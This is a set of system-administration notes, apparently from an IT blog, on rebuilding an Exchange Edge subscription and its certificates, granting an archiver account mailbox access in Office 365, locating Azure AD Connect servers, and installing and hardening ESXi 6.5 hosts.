ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeServiceHost, MSExchangeUM, W3Svc, WinRM}
ServicesNotRunning : {}

Role : Hub Transport Server Role
RequiredServicesRunning : True
ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeEdgeSync, MSExchangeServiceHost,
MSExchangeTransport, MSExchangeTransportLogSearch, W3Svc, WinRM}
ServicesNotRunning : {}

Check the OWA VD settings:

Get-OwaVirtualDirectory | FL Identity,*auth*,*url*
Get-EcpVirtualDirectory | FL Identity,*auth*,*url*

4. Validate access to Exchange Admin Center

– Authenticate to https://{fqdn}/ecp
– If HTTP error 503 or 500 occurs, try https://{fqdn}/ecp/?ExchClientVer=15

5. Additional troubleshooting items

Change the authentication method of the “owa” virtual directory to Windows authentication

set-Owavirtualdirectory -identity "E15MBX\owa (Exchange Back End)" -WindowsAuthentication $True -Basicauthentication $false -Formsauthentication $false
IISReset /noforce
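Related helper: a quick, hedged check for certificates nearing expiration, assuming an Exchange Management Shell session:

# List certs expiring within the next 30 days (threshold is arbitrary)
Get-ExchangeCertificate | Where-Object {$_.NotAfter -lt (Get-Date).AddDays(30)} |
    Format-List FriendlyName,Services,CertificateDomains,NotAfter,Thumbprint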

Raw Notes:

Error:
Failed to connect to the Edge Transport server ADAM instance with exception The supplied credential is invalid.. This could be caused by a failure to resolve the Edge Transport server name EXCH-EDGE.intra.net in DNS, a failure trying to connect to port 50636 on EXCH-EDGE.intra.net, network connectivity issues, an invalid certificate, or an expired subscription. Verify your network and server configuration.

Process to Resolve:

Preliminary steps to rule out easy-to-fix problems:

# Verify connectivity from Hub to Edge
Ran a check-netconnection function (a Test-NetConnection wrapper) to verify connectivity from exch-hub to EXCH-EDGE on port 50636 with success = $true
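# The built-in equivalent of that check (a hedged example; assumes PowerShell 4.0+ on the Hub server):
Test-NetConnection -ComputerName EXCH-EDGE.intra.net -Port 50636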

# Check to see whether there are any error messages in the queue:
Get-queue

Restart some services on Hub and Edge servers
1. Restart the following services on MBX Server
Microsoft Exchange EdgeSync
Microsoft Exchange Transport
2. Restart the following services on Edge Server
Microsoft Exchange ADAM
Microsoft Exchange Credential service
Microsoft exchange Transport

# Confirm that the certificate matches the FQDN of the Edge server and that it has been enabled for the SMTP service
get-exchangecertificate | FL

Intermediate Level steps to address connector issues:

Mail flow:
Outlook client <==> Hub Exchange <==> Edge Exchange <==> Barracuda (smart host) <==> Internet <==> Destination email systems

Generalization:
- The Hub uses EdgeSync to connect to the Edge server via ADAM credentials, and those are periodically changed by the "Edge Credential Service"
- Only the Client Access role server requires public certs; the other roles do not
- Connectors between Edge and Hub servers require SSL, and those can be private certs
- If the Edge server cert is updated, the New-EdgeSubscription command needs to be run to generate a new newEdgeSubscription.xml file
- The newEdgeSubscription.xml then needs to be imported on the Hub server to bring in the new Edge connector information
- Make sure the credential service is up and running on the Edge
- Running Start-EdgeSynchronization is required to synchronize Edge and Hub if a new subscription has been created
- Send connectors and Receive connectors can be automatically generated

[PS] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Exchange Server 2010>Start-EdgeSynchronization

RunspaceId : f9a541a8-51db-4b87-a392-b727eeae6c42
Result : CouldNotConnect
Type : Recipients
Name : EXCH-EDGE
FailureDetails : The supplied credential is invalid.
StartUTC : 8/9/2019 6:45:46 PM
EndUTC : 8/9/2019 6:45:46 PM
Added : 0
Deleted : 0
Updated : 0
Scanned : 0
TargetScanned : 0

RunspaceId : f9a541a8-51db-4b87-a392-b727eeae6c42
Result : CouldNotConnect
Type : Configuration
Name : EXCH-EDGE
FailureDetails : The supplied credential is invalid.
StartUTC : 8/9/2019 6:45:46 PM
EndUTC : 8/9/2019 6:45:46 PM
Added : 0
Deleted : 0
Updated : 0
Scanned : 0
TargetScanned : 0

[PS] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Exchange Server 2010>Get-EdgeSubscription

Name Site Domain
---- ---- ------
EXCH-EDGE intra.net/Co... intra.net

==============================================================================

Recreate Edge Subscription:

On Hub server

# Generate new private Exchange certificate
$domain="exch-hub"
$fqdn="exch-hub.intra.net"
New-ExchangeCertificate -DomainName $domain, $fqdn -PrivateKeyExportable $true -KeySize 2048

# Check certs
get-ExchangeCertificate

# Get more details about cert
# $newcert = get-ExchangeCertificate | ? { $_.certdate -like "blah blah"} | select name
$newcert="#######"
get-exchangecertificate $number | fl

# set iis to bind to new cert
# perform iisreset
# backup old cert and remove it

# New-SendConnector -Custom -Name Barracuda -AddressSpaces * -smarthost 10.10.11.1 -ForceHELO $true -SmartHostAuthMechanism None -Source $edgeServer

# Remove Edge Subscription
Get-EdgeSubscription | Remove-EdgeSubscription

On Edge

# Clean up old certs
certlm.msc > remove the old Microsoft Exchange ADAM cert from the Personal certificates folder

# Remove Edge Subscription
Get-EdgeSubscription | Remove-EdgeSubscription

# Generate new subscription file
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml
Restart the Microsoft Exchange ADAM service

On Hub server
# New-EdgeSubscription -FileData ([byte[]]$(Get-Content -Path "\\EXCH-EDGE\c$\newEdgeSubscription.xml" -Encoding Byte -ReadCount 0)) #Experimental command
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml
Start-EdgeSynchronization
Test-EdgeSynchronization

[PS] C:\Windows\system32>New-EdgeSubscription -Filename c:\newEdgeSubscription.xml

Confirm
If you create an Edge Subscription, this Edge Transport server will be managed via EdgeSync replication. As a result,
any of the following objects that were created manually will be deleted: accepted domains, message classifications,
remote domains, and Send connectors. After creating the Edge Subscription, you must manage these objects from inside
the organization and allow EdgeSync to update the Edge Transport server. Also, the InternalSMTPServers list of the
TransportConfig object will be overwritten during the synchronization process.
EdgeSync requires that this Edge Transport server is able to resolve the FQDN of the Hub Transport servers in the
Active Directory site to which the Edge Transport server is being subscribed, and those Hub Transport servers be able
to resolve the FQDN of this Edge Transport server. You should complete the Edge Subscription inside the organization in
the next "1440" minutes before the bootstrap account expires.
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "Y"): y


New-EdgeSubscription : Microsoft Exchange couldn't create or update the Edge Subscription account on the Edge Transport
server for the following reason: The LDAP server is unavailable.. Stack is at System.DirectoryServices.Protocols.LdapConnection.Connect()
at system.DirectoryServices.Protocols.LdapConnection.BindHelper(NetworkCredential newCredential, Boolean needSetCredential)
at Microsoft.Exchange.MessageSecurity.EdgeSync.AdamUserManagement.CreateOrUpdateADAMPrincipal(String user, String password, Boolean bootStrapAccount, TimeSpan expiry)
at Microsoft.Exchange.Management.SystemConfigurationTasks.NewEdgeSubscription.InitiateSubscriptionOnEdge()
At line:1 char:21
+ New-EdgeSubscription <<<< -Filename c:\newEdgeSubscription.xml
+ CategoryInfo : InvalidOperation: (:) [New-EdgeSubscription], InvalidOperationException
+ FullyQualifiedErrorId : 780DB3C3,Microsoft.Exchange.Management.SystemConfigurationTasks.NewEdgeSubscription

# Check status of Exchange ADAM Services
Get-Service *ADAM* | ft Di*,St*

# Check Exchange certificates
[PS] C:\Windows\system32>Get-ExchangeCertificate | fl

AccessRules : {System.Security.AccessControl.CryptoKeyAccessRule, System.Security.AccessControl.CryptoKeyAccessR
ule}
CertificateDomains : {ab0ee702-f37f-4dff-bfb2-66698a441d9a}
HasPrivateKey : True
IsSelfSigned : False
Issuer : CN=280b6975-b30a-4f5b-b2c3-7864e37f1c05
NotAfter : 8/9/2119 1:36:53 PM
NotBefore : 8/9/2019 12:36:53 PM
PublicKeySize : 2048
RootCAType : Unknown
SerialNumber : 73AC7DDB217BA7AF44847CC68A8B9CC9
Services : None
Status : Invalid
Subject : CN=ab0ee702-f37f-4dff-bfb2-66698a441d9a
Thumbprint : CFD78D7F9DFAA0BD537B3755C24089CE3ED0EC55

AccessRules :
CertificateDomains : {EXCH-EDGE, EXCH-EDGE.intra.net}
HasPrivateKey : True
IsSelfSigned : True
Issuer : CN=EXCH-EDGE
NotAfter : 10/11/2017 11:09:54 PM
NotBefore : 10/11/2012 11:09:54 PM
PublicKeySize : 2048
RootCAType : Registry
SerialNumber : 5DC03A0D09D1C594468C11CE9EC919D4
Services : SMTP
Status : DateInvalid
Subject : CN=EXCH-EDGE
Thumbprint : 4157434692710986BAC026FD2DFE32D4352DE9B3

AccessRules :
CertificateDomains : {intra.net, www.intra.net, exch-cas.intra.net, apollo.inglewood.kimconnect.com, autodisc
over.intra.net, autodiscover.inglewood.kimconnect.com, pop.inglewood.kimconnect.com, imap.inglewood.kimconnect.com, inglewood.kimconnect.com, legacy.intra.net, legacy.inglewood.kimconnect.com}
HasPrivateKey : True
IsSelfSigned : False
Issuer : SERIALNUMBER=07969287, CN=Go Daddy Secure Certification Authority, OU=http://certificates.godaddy.
com/repository, O="GoDaddy.com, Inc.", L=Scottsdale, S=Arizona, C=US
NotAfter : 5/16/2016 11:18:35 AM
NotBefore : 5/16/2011 11:18:35 AM
PublicKeySize : 2048
RootCAType : ThirdParty
SerialNumber : 2B94032E16C980
Services : SMTP
Status : DateInvalid
Subject : CN=intra.net, OU=Domain Control Validated, O=intra.net
Thumbprint : A05FBA0E72AD3D3E666973C9AFDE378535E24393

=============================================================================================

# Create New Cert
$domain="EXCH-EDGE"
$fqdn="exch-hub.intra.net"
$friendlyName="Exchange Certificate"
New-ExchangeCertificate -FriendlyName $friendlyName -SubjectName CN=$domain -DomainName $domain,$fqdn -PrivateKeyExportable $true #Optional:-Services SMTP -KeySize 2048

# Check for self-signed certs
Get-ExchangeCertificate | where {$_.Status -eq "Valid" -and $_.IsSelfSigned -eq $true} | Format-List FriendlyName,Subject,CertificateDomains,Thumbprint,NotBefore,NotAfter

# Restart Exchange Transport
Stop-Service MSExchangeTransport
Start-Service MSExchangeTransport

# Create new Subscription on Edge servers:
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml

# Import subscription on Hub server
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml

# On Hub, trigger New Edge Subscription via Exchange Management Console GUI
$site='intra.net/Configuration/Sites/DistrictOffice'
New-EdgeSubscription -FileData '<Binary Data>' -Site $site -CreateInternetSendConnector $true -CreateInboundSendConnector $true

# Trigger sync
start-edgesynchronization -forcefullsync

# Restart Exchange Transport
Stop-Service MSExchangeTransport
Start-Service MSExchangeTransport

# Check mail queue
Get-Queue

# Check logs, navigate to:
%exchangeinstallpath%\TransportRoles\Logs\ProtocolLog\SmtpReceive

# Create new connector to point to the smart host (Barracuda spam filter). Make sure that the Source of Send Connector is Edge Server (not Hub Server)
# Disable the automatically generated connector that does not use the smart host

# Example of mail flow issue when the smart host does not accept connections from the Hub server. Resolution was to change the connector Source to the Edge transport

[PS] C:\Windows\system32>Get-Queue

Identity DeliveryType Status MessageCount NextHopDomain
-------- ------------ ------ ------------ -------------
exch-hub\1639048 MapiDelivery Active 17 school-mailboxdb3
exch-hub\1639053 SmartHost... Retry 5675 [10.10.1.11]
exch-hub\1639058 MapiDelivery Active 10 do-mailboxdb
exch-hub\1639059 MapiDelivery Active 12 school-mailboxdb4
exch-hub\1639060 MapiDelivery Active 14 school-mailboxdb2
exch-hub\Submission Undefined Ready 103 Submission
exch-hub\Shadow\1591071 ShadowRed... Ready 62 EXCH-EDGE.intra.net
exch-hub\Shadow\1639036 ShadowRed... Ready 166 EXCH-EDGE.intra.net

[PS] C:\Windows\system32>Get-Queue -Identity exch-hub\1639053 | fl #where 1639053 is Identity of the smart host

RunspaceId : b2e3dae0-ecb1-4508-b307-31da04271141
DeliveryType : SmartHostConnectorDelivery
NextHopDomain : [10.10.1.11]
TlsDomain :
NextHopConnector : 77215356-bf27-49bc-bd41-4603375ac561
Status : Retry
MessageCount : 5656
LastError : 451 4.4.0 Primary target IP address responded with: "421 4.4.2 Connection dropped due to SocketE
rror." Attempted failover to alternate host, but that did not succeed. Either there are no alter
nate hosts, or delivery failed to all alternate hosts.
LastRetryTime : 8/9/2019 5:45:39 PM
NextRetryTime : 8/9/2019 5:50:39 PM
DeferredMessageCount : 0
QueueIdentity : exch-hub\1639053
Identity : exch-hub\1639053
IsValid : True

Barracuda Message Archiver & Office 365 Exchange Online Service Account Configuration

The following script grants an Office 365 Exchange Online service account the permissions required for the Barracuda Message Archiver to access all mailboxes.

# Office 365 Global Admin Credential
$username="GLOBALADMIN@kimconnect.com"
$password=ConvertTo-securestring "PASSWORD" -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username,$password
# $cred = Get-Credential

# Connect to Office 365
if (!(Get-Module -ListAvailable -Name MSOnline)){Install-Module MSOnline -Confirm:$false -Force;}
$O365Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $cred -Authentication Basic -AllowRedirection
Import-PSSession $O365Session -AllowClobber

# Set permissions for Barracuda service account for all mailboxes on O365
$serviceAccount="barracuda_srv@kimconnect.com"
Get-Mailbox -ResultSize unlimited | Add-MailboxPermission -User $serviceAccount -AccessRights fullaccess -InheritanceType all -Automapping $false

Note: newly created mailboxes will not inherit these permissions unless the access grants are re-applied, so this script should run as a scheduled task. In that case, the plain-text password credential method should be converted to XML creds saved to a local directory for subsequent executions (see the sketch below).
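A minimal sketch of that conversion, assuming the scheduled task runs under the same account that exported the credential (Export-Clixml protects the secure string with DPAPI, so only that account on that machine can read it back); the path is illustrative:

# Run once, interactively, to save the credential (path is an example)
Get-Credential | Export-Clixml "C:\Scripts\barracuda_o365_cred.clixml"
# Then, inside the scheduled task, import it back before building the O365 session
$cred = Import-Clixml "C:\Scripts\barracuda_o365_cred.clixml"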

PowerShell: Microsoft Exchange to Require that all Senders are Authenticated

In this scenario, the business decision is to limit exposure of certain internal accounts by only allowing them to receive emails from the same “Exchange Organization”. This is an extra measure to improve the enterprise security posture by further reducing spam and potential messaging vulnerabilities.

# Set "Require that all senders are authenticated" for one account
$targetUsername="PORequests"
$targetObject = Get-ADUser -Filter 'SamAccountName -eq $targetUsername'
Set-ADUser $targetObject -Replace @{msExchRequireAuthToSendTo = $True}
# Set "Require that all senders are authenticated" for all Distribution Groups
$distributionGroups = Get-ADGroup -Filter 'groupcategory -eq "distribution"'
ForEach ($group In $distributionGroups){
#$group.Name
Set-ADGroup $group -Replace @{msExchRequireAuthToSendTo = $True}
}
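A hedged spot check to confirm the attribute change took effect (reuses $targetUsername from the snippet above):

Get-ADUser -Identity $targetUsername -Properties msExchRequireAuthToSendTo |
    Select-Object Name,msExchRequireAuthToSendTo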

PowerShell: Find Azure AD Connect Servers

Azure AD Connect is a prevalent topic of the day. However, it is best practice to have only one instance installed per Active Directory forest. Yup, this thing can serve multiple domains of an entire forest; in fact, transitive trusts between forests would enable a single instance of AD Connect to sync accounts from domains of different forests. Long story short: do not install multiple instances of this thing. Here’s a way to quickly locate the Azure AD Connect host(s) in your environment.

Method 1: Search in Active Directory

# 1-liner to find the server(s) where AD Connect was used
(Get-ADUser -filter 'name -like "Msol*"' -Properties Description).Description | %{[void]($_ -match "computer\s(.+)\sconfigured");$matches[1]}

# Other methods to retrieve additional variables
$regexMatchAdConnectServers="computer\s(.+)\sconfigured"
$adConnectServers=(Get-ADUser -filter 'name -like "Msol*"' -Properties Description).Description | %{[void]($_ -match $regexMatchAdConnectServers);$matches[1]}
$adConnectServers

# Other variables
# $adConnectUsernames=(Get-ADUser -filter 'name -like "Msol*"').SamAccountName;
# $adConnectAccountDescriptions | %{$splitOnKeywordBefore = ($_ -split "computer ")[1];$splitOnKeywordAfter = ($splitOnKeywordBefore -split " configured")[0]; $splitOnKeywordAfter}
PS C:\Windows> (Get-ADUser -filter 'name -like "Msol*"' -Properties Description).Name
MSOL_xxxxxxxxxxxxxx
PS C:\Windows> Get-ADUser -filter 'name -like "Msol*"' -Properties Description


Description : Account created by Microsoft Azure Active Directory Connect with installation identifier
xxxxxxxxxxxxxx running on computer TOR-ADFS01 configured to synchronize to
tenant vectorusa.com. This account must have directory replication permissions in the local Active
Directory and write permission on certain attributes to enable Hybrid Deployment.
DistinguishedName : CN=MSOL_6a1e57285b53,CN=Users,DC=intranet,DC=kimconnect,DC=com
Enabled : True
GivenName :
Name : MSOL_xxxxxxxxxxxxxx
ObjectClass : user
ObjectGUID : 3f6aa813-fe12-42fd-ab27-xxxxxxxxxxxxxx
SamAccountName : MSOL_xxxxxxxxxxxxxx
SID :
Surname :
UserPrincipalName :

Method 2: Search on Office 365

# Office 365 Global Admin Credential
$username="GLAOBAO-ADMING@kimconnect.com"
$password=ConvertTo-securestring "PASSWORT" -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username,$password
#$cred = Get-Credential

# Connect to Office 365
if (!(Get-Module -ListAvailable -Name MSOnline)){Install-Module MSOnline -Confirm:$false -Force;}
# Install-Module AzureAD -Confirm:$false -Force # Azure AD may not be necessary for managing O365
$O365Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $cred -Authentication Basic -AllowRedirection
Import-PSSession $O365Session -AllowClobber
Connect-MsolService -Credential $cred

# Collect O365 accounts with the Sync_ prefix and then use regex to retrieve the associated computer names
$azureSyncAccounts=(Get-MsolUser -EnabledFilter EnabledOnly -All | Where-Object {$_.UserPrincipalName -like "Sync_*"}).UserPrincipalName
$azureSyncAccounts | %{[void]($_ -match "_(.+)_");$matches[1]}

ESXi 6.5 Installation Instructions

Prepare to Install


⦁ Reserve host Management & vMotion IPs

⦁ Pick an available IP from the IP tracking spreadsheet
⦁ Ping the IP to ensure it is not already in use by an existing device
⦁ Confirm with Systems/Network Team that such IP could be assigned without conflicts

⦁ Add DNS entry of new host into Active Directory Integrated DNS

⦁ Access a DNS server
⦁ Run the MMC DNS utility to add an A record and a reverse-lookup (PTR) record for the new host, following the example below

⦁ Install SSH client & Internet browser onto client workstation

⦁ Add a SSH console such as OpenSSH Client or Putty
⦁ Verify that IExplorer, Chrome, or Firefox with HTML5 capability is available

⦁ Verify that the ISO is available at this path: \\nas\System Engineering\Software\VMware\
⦁ Apply Server Profile

⦁ Prior to applying a server profile, the targeted host must be turned off: OneView > Server Hardware > Select the appropriate Server Item > Click on Actions > Power Off

 

⦁ Create Server Profile

OneView > Server Hardware > Select the appropriate Server Item > Click on “Create Profile” from the Hardware section > mimic this screenshot to apply an ESXi Template

Initialize ESXi host

⦁ Launch iLO Console to mount the ESXi virtual ISO

⦁ Access OneView > Server Profiles > Actions > Launch Console

⦁ Assuming that the HTML5 or Java iLO Web Part has already been installed prior, this screen should appear

⦁ “Virtual Drives” is set via the Image File option

Begin the Install

⦁ Click on Power Switch and allow POST to proceed and pause at this screen

⦁ Click Continue and follow the prompt to arrive here

⦁ Do not perform an in-place upgrade over an older version if prompted; select the overwrite installation option.
⦁ Generate the root password according to our standardized requirements
⦁ Input the host’s root password into Passwords Safe
⦁ Press F2 to log into the console for the initial “System Customization”
⦁ From the “Troubleshooting Options” screen, Enable the ESXi Shell and SSH

⦁ Set management console IP, subnet and default gateway (sample below)

⦁ Disable IPv6 configuration

⦁ Set in lower case the FQDN hostname and DNS servers:
⦁ Mars: Primary 10.10.10.10 Secondary 10.10.10.11
⦁ Venus: Primary 10.10.20.10 Secondary 10.10.20.11

⦁ Set the domain name for Custom DNS Suffixes

⦁ Test Management Network Settings
⦁ Ping the management console IP to test the network settings.
⦁ Verify setup by using the Testing Management Network utility

Perform More Configurations via SSH

Engineers may prefer to use the console shell or an SSH client such as PuTTY to execute these lines. These instructions are intended for those who are already familiar with ESXi servers and CLI commands; the availability of CLI tools on the engineer’s PC is assumed.

Isolation Tools

⦁ Execute the following commands from the CLI as the root user:

cp -p /etc/vmware/config /etc/vmware/config.orig

echo 'isolation.tools.copy.disable = "FALSE"' >> /etc/vmware/config

echo 'isolation.tools.paste.disable = "FALSE"' >> /etc/vmware/config

cat /etc/vmware/config
Add centralized logging

⦁ Execute the following commands from the CLI (assuming 10.10.10.100 is the syslog server):

esxcli system syslog config set --loghost='udp://10.10.10.100:514'

esxcli system syslog reload

esxcli network firewall ruleset set --ruleset-id=syslog --enabled=true

esxcli network firewall refresh
⦁ Check settings
[KIMCONNECT\admin@FLO-ESX05:~] esxcli system syslog config get
Default Network Retry Timeout: 180
Dropped Log File Rotation Size: 100
Dropped Log File Rotations: 10
Enforce SSLCertificates: true
Local Log Output: /scratch/log
Local Log Output Is Configured: false
Local Log Output Is Persistent: true
Local Logging Default Rotation Size: 1024
Local Logging Default Rotations: 8
Log To Unique Subdirectory: false
Message Queue Drop Mark: 90
Remote Host: udp://10.10.10.100:514
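For remote administration, the same syslog target can also be set with PowerCLI; a hedged alternative, assuming the VMware.PowerCLI module and an existing Connect-VIServer session (FLO-ESX05 is the example host from above):

# Hedged PowerCLI alternative to the esxcli syslog command above
Get-VMHost -Name FLO-ESX05 | Get-AdvancedSetting -Name Syslog.global.logHost |
    Set-AdvancedSetting -Value 'udp://10.10.10.100:514' -Confirm:$false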
ESXi Storage configuration
Change default pathing policy and IOPS options

⦁ Execute the following command from the CLI to set the default PSP:

esxcli storage nmp satp set --default-psp=VMW_PSP_RR --satp=VMW_SATP_ALUA

⦁ Use the following command to create a custom SATP rule that will allow the ESXi host to configure the HPE 3PAR LUNs to use Round Robin multipath policy. The command must be executed on each ESXi host that is connected to the HPE 3PAR array.

esxcli storage nmp satp rule add -s "VMW_SATP_ALUA" -P "VMW_PSP_RR" -O "iops=1" -c "tpgs_on" -V "3PARdata" -M "VV" -e "HPE 3PAR Custom Rule"

⦁ Verify the new rule using the following commands:

esxcli storage nmp device list
esxcli storage nmp satp list
esxcli storage nmp satp rule list | grep "3PARdata"

⦁ Set the queue-full-threshold parameter to a value less than or equal to queue-full-sample-size:

esxcli system settings advanced set -o /Disk/QFullSampleSize -i "32"
esxcli system settings advanced set -o /Disk/QFullThreshold -i "4"

⦁ Disable ATS heartbeats:

esxcli system settings advanced set -i 0 -o /VMFS3/UseATSForHBOnVMFS5

⦁ Review settings:

esxcli system settings advanced list -o /VMFS3/UseATSForHBOnVMFS5

Secure ESXi Host
Configure TLS

Run the following command to enable only TLS 1.2 by disabling the older protocols via the UserVars.ESXiVPsDisabledProtocols advanced setting

esxcli system settings advanced set -o /UserVars/ESXiVPsDisabledProtocols -s "sslv3,tlsv1,tlsv1.1"
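A hedged PowerCLI equivalent of the command above (assumes VMware.PowerCLI and an active Connect-VIServer session):

Get-VMHost -Name FLO-ESX05 | Get-AdvancedSetting -Name UserVars.ESXiVPsDisabledProtocols |
    Set-AdvancedSetting -Value 'sslv3,tlsv1,tlsv1.1' -Confirm:$false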

Edit the config.xml file
⦁ Make a backup of config.xml

cp -p /etc/vmware/rhttpproxy/config.xml /etc/vmware/rhttpproxy/config.xml_orig

⦁ Edit the config file using vi text editor

vi /etc/vmware/rhttpproxy/config.xml

⦁ Type /ssl to search for that keyword > press enter > edit the SSL section with this:

<ssl>
  <doVersionCheck>true</doVersionCheck>
  <!-- allowed SSL/TLS protocol versions -->
  <protocols>tls1.2</protocols>
  <cipherList>!aNULL:kECDH+AESGCM:ECDH+AESGCM:!RSA+AESGCM:kECDH+AES:ECDH+AES:!RSA+AES</cipherList>
  <libraryPath>/lib/</libraryPath>
</ssl>
Add TLS and Cipher Settings

TLS and cipher settings are set inside the configuration file of the Small Footprint CIM Broker (SFCB), since that Common Information Model (CIM) provider controls sfcbd and openwsman in ESXi 6.5. The WBEM service must be disabled before editing so that the SFCB changes take effect when it is re-enabled.

⦁ Disable the WBEM service by executing the following command

esxcli system wbem set --enable false

⦁ Make a backup of sfcb.cfg

cp -p /etc/sfcb/sfcb.cfg /etc/sfcb/sfcb.cfg_orig

⦁ Append the following lines to the tail of the sfcb.cfg file

cat << EOT >> /etc/sfcb/sfcb.cfg
enableTLSv1:false
enableTLSv1_1:false
enableTLSv1_2:true
sslCipherList:!aNULL:kECDH+AESGCM:ECDH+AESGCM:kECDH+AES:ECDH+AES
EOT

⦁ Re-enable the WBEM service.

esxcli system wbem set --enable true
Disable remote SSH root login and CBC cipher

These procedures require a host reboot or a restart of the SSH service to become effective. Be advised that once this policy is active, remote root SSH logins will be refused.

⦁ Backup the sshd_config file prior to changing it

cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.orig

⦁ Edit /etc/ssh/sshd_config from the CLI to disable remote root login and CBC ciphers

⦁ Execute the following command to confirm new settings

cat /etc/ssh/sshd_config
Optional: Re-enable SSH Root Login

In the event that SSH root login is required (or when Active Directory integration is broken), this is the method to reverse changes in previous sub-section.

⦁ Gain console access to ESXi host
⦁ If using HPE OneView: click on OneView > Server Profiles > highlight the correct ESXi host name > click on Actions > Launch Console
⦁ If using iLO: simply login to the iLO IP address or hostname of the intended machine and launch console
⦁ Edit sshd_config via ESX Shell within console
⦁ At the login screen, press Alt + F1 to enter Shell Mode
⦁ Edit /etc/ssh/sshd_config from the CLI to re-enable remote root login (reversing the change from the previous sub-section)
⦁ Restart sshd
/etc/init.d/SSH restart
⦁ Exit Shell Mode by pressing Alt + F2

Further Configuration via Web UI

⦁ Navigate to the ESXi server Web UI URL using Internet Explorer or Chrome: https://servername_or_IP/

⦁ Uncheck Join the VMware Customer Experience Improvement Program. This prompt only appears once upon initial login.

⦁ Right click on Host to “Enter Maintenance mode”

⦁ Set Admin Groups

⦁ Navigate to the “Manage” menu, click on the “System” tab and under Advanced Settings, rename the “Config.HostAgent.plugins.hostsvc.esxAdminsGroup” value to “VMware Enterprise Admins”

⦁ On the “System” tab under Advanced Settings, change the “UserVars.SuppressShellWarning” value to “1”
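Both advanced settings above can also be applied remotely with PowerCLI; a hedged sketch under the same assumptions as the earlier PowerCLI examples:

$vmhost = Get-VMHost -Name FLO-ESX05
Get-AdvancedSetting -Entity $vmhost -Name Config.HostAgent.plugins.hostsvc.esxAdminsGroup |
    Set-AdvancedSetting -Value 'VMware Enterprise Admins' -Confirm:$false
Get-AdvancedSetting -Entity $vmhost -Name UserVars.SuppressShellWarning |
    Set-AdvancedSetting -Value 1 -Confirm:$false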

Configure time sources

⦁ Navigate to Manage > System > Time & date > Edit settings
⦁ Select Start and stop with host for the NTP Service Start Policy
⦁ Set the appropriate NTP servers, separating them with commas
10.10.10.10, 10.10.10.11 (DC1 & DC2)
⦁ Save settings
⦁ Click on Actions > NTP Service > Start
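The NTP steps above can also be scripted with PowerCLI; a hedged sketch (assumes VMware.PowerCLI and a Connect-VIServer session):

$vmhost = Get-VMHost -Name FLO-ESX05
Add-VMHostNtpServer -VMHost $vmhost -NtpServer "10.10.10.10","10.10.10.11"
# Start and stop the NTP daemon with the host, then start it now
Get-VMHostService -VMHost $vmhost | Where-Object {$_.Key -eq 'ntpd'} |
    Set-VMHostService -Policy "On" -Confirm:$false
Get-VMHostService -VMHost $vmhost | Where-Object {$_.Key -eq 'ntpd'} | Start-VMHostService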

Set Certificates
Rename local data stores

Navigate to the “Storage” menu > rename the local Datastore to HOSTNAME_001 (e.g. FLO-ESX05_001)
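A hedged PowerCLI one-liner for the rename (assumes the local datastore still carries the default name datastore1):

# "datastore1" is the assumed default name of the local datastore
Get-Datastore -Name datastore1 -VMHost (Get-VMHost -Name FLO-ESX05) | Set-Datastore -Name FLO-ESX05_001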

Join Active Directory

⦁ Click on “Manage” > “Security and users” > “Authentication” > “Join Domain”
⦁ Use a Domain Admin account to complete this step
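A hedged PowerCLI alternative for the domain join (the domain name below is illustrative):

# Domain name is an example; substitute your own
Get-VMHost -Name FLO-ESX05 | Get-VMHostAuthentication |
    Set-VMHostAuthentication -Domain intranet.kimconnect.com -JoinDomain -Credential (Get-Credential) -Confirm:$false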

Configure Networking

⦁ Click on “Networking” > right-click “VM Network” > Remove
⦁ Select Virtual Switches tab > right-click vSwitch0 > Add Uplink > configure all the Security settings to Reject > Save

⦁ Click Add standard virtual switch > name it vSwitch1 > set vmnic6 as uplink 1 > Add > right-click vSwitch1 > Add uplink > select vmnic7 > Save

⦁ Select the VMKernel NICs tab > Add VMkernel NIC > set New port group as “vMotion” > click IPv4 settings > input an assigned static IP and Subnet mask > set TCP/IP stack as “vMotion stack” > Create

⦁ Click on Port groups tab > add a new port group with the format of 082_10.X.X to vSwitch0

⦁ Right-click “Management Network” port group > NIC Teaming > confirm the Override failover order for the NIC teaming of “vmnic1” as “Standby” > Save

⦁ Right-click “vMotion” port group > NIC Teaming > set the NIC Teaming failover order of “vmnic0” as “Standby” > Save

⦁ Select Port groups tab > add a new port group named vCSA-HA to vSwitch1 with default settings

⦁ Select Port groups tab > add a new port group named MSCS to vSwitch1 with default settings

vCenter Integration
Add ESXi host to vCenter

⦁ Log into the vCenter vSphere Web Client and add the ESXi host to the data center object.
⦁ This screenshot shows a new host being added to the LAS cluster

Licensing

⦁ Licensing options may already have been set in the previous step. In case that step was bypassed, here is the sequence to access this screen:
Select host > Configure > System > Licensing > Assign License

⦁ Associate new host with a valid license (VMware vCloud Suite Advanced for vSphere 6)

Configure with vSphere Distributed Switch

This section assumes that the Distributed Switch(es) have already been created, and that the new ESXi host is to be added to them

⦁ From the “Networking” tab, locate and right-click on the desired “vSphere Distributed Switch”

⦁ Click on “Add and Manage Host,” then follow the wizard to completion while matching these hinting screenshots
⦁ Uncheck the default selection of “Manage VMkernel adapters” while following the wizard prompts

⦁ Set vmnic4 & vmnic5 as uplinks


Update VMware Host
VMware Update Manager

⦁ Ensure that the host is in “Maintenance” mode.
⦁ From the “Update Manager” tab, highlight the server and click on the “Scan” link from the top right corner.
⦁ After the scan has completed, click on the “Stage Patches” button. Select these baselines to stage the targeted host:

⦁ Critical Host Patches (Predefined)
⦁ Non-Critical Host Patches (Predefined)

⦁ Click on Remediate and apply the patches using the default choices presented by the wizard. The machine will reboot during this process.

⦁ Enable the ESXi Side-Channel-Aware Scheduler using the vSphere Web Client.

